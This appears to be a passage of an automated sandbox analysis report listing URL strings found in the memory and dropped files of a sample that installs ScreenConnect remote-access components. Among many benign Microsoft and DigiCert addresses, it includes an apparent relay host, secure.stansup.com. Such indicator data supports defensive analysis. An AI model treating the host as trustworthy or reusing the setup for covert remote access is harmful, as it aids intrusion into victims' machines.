Source: svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2
Source: svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1454980139.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507366412.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514111409.000001CEA3179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507340782.000001CEA310F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524365290.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1476303270.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455119455.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608495004.000001CEA3100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477152749.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455865428.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455646765.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 00000008.00000003.1413548396.000001CEA3153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
Source: svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x
Source: svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1476303270.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455119455.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608495004.000001CEA3100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477152749.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455865428.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455646765.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492113188.000001CEA315C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAA
Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 00000008.00000003.1514111409.000001CEA3179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 00000008.00000003.1413548396.000001CEA3153000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 96r3GgxntQ.exe, 00000000.00000002.1554370443.000000000082A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digi
Source: dfsvc.exe, 00000002.00000002.2255837190.00000276A4168000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2252252771.00000276A2AD0000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.dr String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://ocsp.digicert.com0
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2AD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
Source: dfsvc.exe, 00000002.00000002.2255109101.00000276A4125000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000002.00000002.2255528348.00000276A415C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://passport.net/tb
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/20
Source: svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA312F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609998357.000001CEA36DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee0
Source: svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee1
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesue
Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: dfsvc.exe, 00000002.00000002.2237912718.0000027689FE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://secure.stansup.com
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: dfsvc.exe, 00000002.00000002.2256074247.00000276A419F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://w23.org/2001/X3hema-instanc:v
Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.w3.
Source: dfsvc.exe, 00000002.00000002.2256734540.00000276A4251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.w3.=U
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1745338793.000000001ACF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A535000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A59C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A070000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A070000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806013
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388501755.000001CEA3157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.live.com/msangcwame
Source: ScreenConnect.Core.dll.2.dr String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: edb.log.7.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000007.00000003.1383388328.0000025CF7860000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ApproveSession.srf53457
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502er
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ManageLoginKeys.srfP
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1498219510.000001CEA36D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/RST2.srf
